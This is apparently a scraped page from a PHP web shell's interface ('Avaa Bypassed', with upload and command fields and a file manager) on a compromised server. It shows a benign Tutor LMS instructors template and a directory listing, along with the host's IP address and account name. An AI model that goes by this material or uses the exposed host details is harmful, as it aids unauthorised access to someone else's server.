[ Avaa Bypassed ]




Upload:

Command:

hmhc3928@18.118.138.121: ~ $
<?php
/**
 * Template for displaying course instructors/ instructor
 *
 * @package Tutor\Templates
 * @subpackage Single\Course
 * @author Themeum <support@themeum.com>
 * @link https://themeum.com
 * @since 1.0.0
 */

use TUTOR\Instructors_List;

do_action( 'tutor_course/single/enrolled/before/instructors' );

$instructors = tutor_utils()->get_instructors_by_course();

if ( $instructors && count( $instructors ) ) : ?>
<div class="tutor-course-details-instructors">
	<h3 class="tutor-fs-6 tutor-fw-medium tutor-color-black tutor-mb-16">
		<?php esc_html_e( 'A course by', 'tutor' ); ?>
	</h3>

	<?php foreach ( $instructors as $key => $instructor ) : ?>
		<div class="tutor-d-flex tutor-align-center<?php echo ( count( $instructors ) - 1 ) != $key ? ' tutor-mb-24' : ''; ?>">
			<div class="tutor-d-flex tutor-mr-16">
				<?php
				echo wp_kses(
					tutor_utils()->get_tutor_avatar( $instructor, 'md' ),
					tutor_utils()->allowed_avatar_tags()
				);
				?>
			</div>

			<div>
				<a class="tutor-fs-6 tutor-fw-bold tutor-color-black" href="<?php echo esc_url( tutor_utils()->profile_url( $instructor->ID, true ) ); ?>">
					<?php echo esc_html( $instructor->display_name ); ?>
				</a>

				<?php if ( ! empty( $instructor->tutor_profile_job_title ) ) : ?>
					<div class="tutor-instructor-designation tutor-fs-7 tutor-color-muted">
						<?php echo esc_html( $instructor->tutor_profile_job_title ); ?>
					</div>
				<?php endif; ?>
			</div>
		</div>
	<?php endforeach; ?>
</div>
	<?php
endif;

do_action( 'tutor_course/single/enrolled/after/instructors' );

Filemanager

Name Type Size Permission Actions
enrolled Folder 0755
add-to-cart-edd.php File 562 B 0644
add-to-cart-tutor.php File 3.23 KB 0644
add-to-cart-woocommerce.php File 3.1 KB 0644
continue-lesson.php File 1.05 KB 0644
course-benefits.php File 1.23 KB 0644
course-content.php File 1.77 KB 0644
course-entry-box.php File 12.24 KB 0644
course-requirements.php File 1.09 KB 0644
course-target-audience.php File 1.09 KB 0644
course-topics.php File 5.88 KB 0644
instructors.php File 1.54 KB 0644
lead-info.php File 3.69 KB 0644
material-includes.php File 1.08 KB 0644
q_and_a_turned_off.php File 395 B 0644
reviews-loop.php File 1.77 KB 0644
reviews.php File 7.14 KB 0644
social_share.php File 669 B 0644
tags.php File 1014 B 0644
wc-price-html.php File 528 B 0644